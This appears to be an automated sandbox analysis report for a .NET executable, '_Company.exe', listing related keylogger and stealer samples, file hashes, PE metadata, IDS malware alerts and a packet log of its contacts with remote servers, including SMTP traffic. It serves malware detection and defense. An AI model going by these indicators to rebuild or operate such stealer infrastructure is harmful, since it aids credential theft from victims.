	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	149.154.167.220
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	https://launch.app/plainsart	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossing	Get hash	malicious	Unknown	Browse	149.154.167.220
	yoyf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	yoyf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	hnsjdghf18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220
	kjshdgacg18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.739408365402643
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	_Company.exe
File size:	486'400 bytes
MD5:	aff56992589dfb76554ea1416c3e99d1
SHA1:	7a3e430720860af04ca1e8d029f60749cd98812b
SHA256:	e5dea0ef10ebb4aa8bb909e2bcbb6efb37b32e3bd9fed8deeed60a3aa6130d06
SHA512:	642e5d23657efaac332defce18cb87dae389e538188b146d4c2ccb71e3aa882ccf3b82dbb4da48464bb4f4d79a6b1ff5c6690f98088767fde3be6fb2f7fc823a
SSDEEP:	6144:OkDVQ0CF04tNSJuhGVJRl3+iRfD5NDtWcKpXIlxGQY6D3ST4vHoGGV8VTCAvM72q:QfYCeDXRKIxGQYT+HimCmZi+1xaIBR
TLSH:	CAA4F18455C2782FEEEAAA75422574A0531FF14E6B63851B420DF748FDAC6CE0F42ED1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0..b............... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4780fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x86919054 [Wed Jul 17 15:10:12 2041 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x780b0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7a000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x76104	0x76200	1112f887cad49bd2d34fe0e9bab366aa	False	0.6626880787037037	data	7.746330065690188	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7a000	0x586	0x600	4de767c9ff28b65be637a9be406bb1d9	False	0.4127604166666667	data	4.010295709173847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7c000	0xc	0x200	0b5f5bf1c0dbc3c104321dc72db77bbd	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7a0a0	0x2fc	data			0.43455497382198954
RT_MANIFEST	0x7a39c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T17:07:17.949510+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49716	158.101.44.242	80	TCP
2024-12-18T17:07:20.230737+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49716	158.101.44.242	80	TCP
2024-12-18T17:07:21.982022+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49728	104.21.67.152	443	TCP
2024-12-18T17:07:23.371363+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49736	158.101.44.242	80	TCP
2024-12-18T17:07:26.402613+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49747	158.101.44.242	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 17:07:16.166807890 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:16.288275003 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:16.288379908 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:16.288747072 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:16.409770966 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:17.508570910 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:17.513204098 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:17.632956028 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:17.904112101 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:17.949510098 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:18.089199066 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:18.089255095 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:18.090146065 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:18.103534937 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:18.103571892 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.334461927 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.334546089 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:19.337162018 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:19.337173939 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.337601900 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.386992931 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:19.406647921 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:19.451334000 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.774385929 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.774548054 CET	443	49724	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:19.774651051 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:19.782866955 CET	49724	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:19.787808895 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:19.927519083 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:20.189551115 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:20.192478895 CET	49728	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:20.192502022 CET	443	49728	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:20.192550898 CET	49728	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:20.192830086 CET	49728	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:20.192842960 CET	443	49728	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:20.230736971 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:21.517616987 CET	443	49728	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:21.520905018 CET	49728	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:21.520930052 CET	443	49728	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:21.982057095 CET	443	49728	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:21.982177973 CET	443	49728	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:21.982328892 CET	49728	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:21.982810020 CET	49728	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:21.986720085 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:21.988024950 CET	49736	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:22.108522892 CET	80	49736	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:22.108596087 CET	49736	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:22.108946085 CET	49736	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:22.120328903 CET	80	49716	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:22.120399952 CET	49716	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:22.231538057 CET	80	49736	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:23.323529959 CET	80	49736	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:23.324908972 CET	49739	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:23.324964046 CET	443	49739	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:23.325038910 CET	49739	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:23.325304031 CET	49739	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:23.325325012 CET	443	49739	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:23.371362925 CET	49736	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:24.546830893 CET	443	49739	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:24.550342083 CET	49739	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:24.550383091 CET	443	49739	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:25.017345905 CET	443	49739	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:25.017405033 CET	443	49739	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:25.017462015 CET	49739	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:25.018016100 CET	49739	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:25.021945953 CET	49736	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:25.023165941 CET	49747	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:25.142055035 CET	80	49736	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:25.142116070 CET	49736	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:25.142668009 CET	80	49747	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:25.142751932 CET	49747	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:25.142911911 CET	49747	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:25.265635014 CET	80	49747	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:26.355339050 CET	80	49747	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:26.357471943 CET	49753	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:26.357513905 CET	443	49753	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:26.357584953 CET	49753	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:26.357892990 CET	49753	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:26.357906103 CET	443	49753	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:26.402612925 CET	49747	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:27.585839987 CET	443	49753	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:27.588331938 CET	49753	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:27.588377953 CET	443	49753	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:28.072985888 CET	443	49753	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:28.073136091 CET	443	49753	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:28.073216915 CET	49753	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:28.073724985 CET	49753	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:28.078773022 CET	49756	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:28.198374033 CET	80	49756	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:28.198492050 CET	49756	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:28.198705912 CET	49756	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:28.318245888 CET	80	49756	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:29.409709930 CET	80	49756	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:29.411319971 CET	49764	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:29.411365986 CET	443	49764	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:29.411427021 CET	49764	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:29.411833048 CET	49764	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:29.411850929 CET	443	49764	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:29.459561110 CET	49756	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:30.629038095 CET	443	49764	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:30.631052017 CET	49764	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:30.631078959 CET	443	49764	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:31.098998070 CET	443	49764	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:31.099179983 CET	443	49764	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:31.099333048 CET	49764	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:31.099771976 CET	49764	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:31.104083061 CET	49756	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:31.104865074 CET	49768	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:31.224343061 CET	80	49756	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:31.224453926 CET	49756	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:31.224627972 CET	80	49768	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:31.224709034 CET	49768	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:31.224899054 CET	49768	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:31.344681025 CET	80	49768	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:32.433923006 CET	80	49768	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:32.435529947 CET	49772	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:32.435606003 CET	443	49772	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:32.435693026 CET	49772	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:32.436029911 CET	49772	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:32.436044931 CET	443	49772	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:32.480782986 CET	49768	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:33.654541969 CET	443	49772	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:33.669096947 CET	49772	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:33.669123888 CET	443	49772	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:34.105612993 CET	443	49772	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:34.105765104 CET	443	49772	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:34.105839014 CET	49772	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:34.106336117 CET	49772	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:34.109790087 CET	49768	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:34.110944033 CET	49779	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:34.229943991 CET	80	49768	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:34.230000973 CET	49768	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:34.230623007 CET	80	49779	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:34.230690002 CET	49779	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:34.230876923 CET	49779	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:34.350924015 CET	80	49779	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:35.558201075 CET	80	49779	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:35.560165882 CET	49783	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:35.560220957 CET	443	49783	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:35.560281992 CET	49783	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:35.560544968 CET	49783	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:35.560563087 CET	443	49783	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:35.605767012 CET	49779	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:36.779582977 CET	443	49783	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:36.785839081 CET	49783	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:36.785868883 CET	443	49783	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:37.231611967 CET	443	49783	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:37.231761932 CET	443	49783	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:37.231982946 CET	49783	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:37.232248068 CET	49783	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:37.235507011 CET	49779	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:37.236591101 CET	49787	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:37.355484009 CET	80	49779	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:37.355542898 CET	49779	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:37.356242895 CET	80	49787	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:37.356331110 CET	49787	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:37.356551886 CET	49787	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:37.476613045 CET	80	49787	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:38.559560061 CET	80	49787	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:38.560897112 CET	49792	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:38.560930967 CET	443	49792	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:38.561117887 CET	49792	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:38.561271906 CET	49792	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:38.561280966 CET	443	49792	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:38.605762005 CET	49787	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:39.780922890 CET	443	49792	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:39.782571077 CET	49792	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:39.782588959 CET	443	49792	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:40.228108883 CET	443	49792	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:40.228274107 CET	443	49792	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:40.228328943 CET	49792	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:40.228662968 CET	49792	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:40.231848955 CET	49787	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:40.232904911 CET	49796	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:40.351902962 CET	80	49787	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:40.351984978 CET	49787	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:40.352543116 CET	80	49796	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:40.352742910 CET	49796	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:40.352834940 CET	49796	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:40.472438097 CET	80	49796	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:41.563091040 CET	80	49796	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:41.564414024 CET	49798	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:41.564507008 CET	443	49798	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:41.564632893 CET	49798	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:41.564888954 CET	49798	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:41.564922094 CET	443	49798	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:41.605789900 CET	49796	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:42.785794973 CET	443	49798	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:42.787570000 CET	49798	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:42.787650108 CET	443	49798	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:43.250075102 CET	443	49798	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:43.250251055 CET	443	49798	104.21.67.152	192.168.2.6
Dec 18, 2024 17:07:43.250322104 CET	49798	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:43.250653982 CET	49798	443	192.168.2.6	104.21.67.152
Dec 18, 2024 17:07:43.264013052 CET	49796	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:43.384464979 CET	80	49796	158.101.44.242	192.168.2.6
Dec 18, 2024 17:07:43.384670019 CET	49796	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:43.402621031 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:43.402667046 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:43.402734995 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:43.403240919 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:43.403259993 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:44.785290003 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:44.785392046 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:44.787362099 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:44.787399054 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:44.787739992 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:44.789216995 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:44.835341930 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:45.284585953 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:45.284766912 CET	443	49803	149.154.167.220	192.168.2.6
Dec 18, 2024 17:07:45.284840107 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:45.290191889 CET	49803	443	192.168.2.6	149.154.167.220
Dec 18, 2024 17:07:50.506712914 CET	49747	80	192.168.2.6	158.101.44.242
Dec 18, 2024 17:07:50.811552048 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:50.931649923 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:50.931750059 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:52.417762995 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:52.418638945 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:52.538731098 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:52.809969902 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:52.811453104 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:52.931060076 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:53.203979969 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:53.204421997 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:53.328834057 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:53.657196045 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:53.657460928 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:53.778012991 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.056657076 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.056911945 CET	49824	587	192.168.2.6	172.65.255.143
